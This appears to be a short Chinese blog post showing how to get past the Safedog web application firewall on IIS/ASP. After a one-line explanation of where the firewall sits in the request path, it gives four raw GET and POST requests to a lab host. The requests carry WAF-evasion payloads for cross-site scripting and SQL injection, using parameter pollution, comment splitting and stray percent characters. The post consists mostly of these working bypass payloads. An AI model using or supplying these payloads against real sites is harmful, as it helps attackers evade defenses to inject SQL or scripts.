只要清楚安全狗的数据流是
network->iis->safedog->asp.dll
就知道可能绕过的方式了
GET /1.asp?a=1<img%20src='#'%20onerror=alert() HTTP/1.1 Host: 192.168.199.134 Connection: keep-alive Content-Length: 7
绕过了吧,呵呵
GET /1.asp?a=1%20and/*&a=*/1=1 HTTP/1.1 Host: 192.168.199.134 Connection: keep-alive Content-Length: 7
绕过了吧 呵呵
再来POST基本没什么悬念
POST /1.asp HTTP/1.1 Host: 192.168.199.134 Content-Type: application/x-www-form-urlencoded Connection: keep-alive Content-Length: 20 a=123%20a%nd%201=1
同理跨站
POST /1.asp HTTP/1.1 Host: 192.168.199.134 Content-Type: application/x-www-form-urlencoded Connection: keep-alive Content-Length: 20 a=<scri%pt>alert()</scri%pt>
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论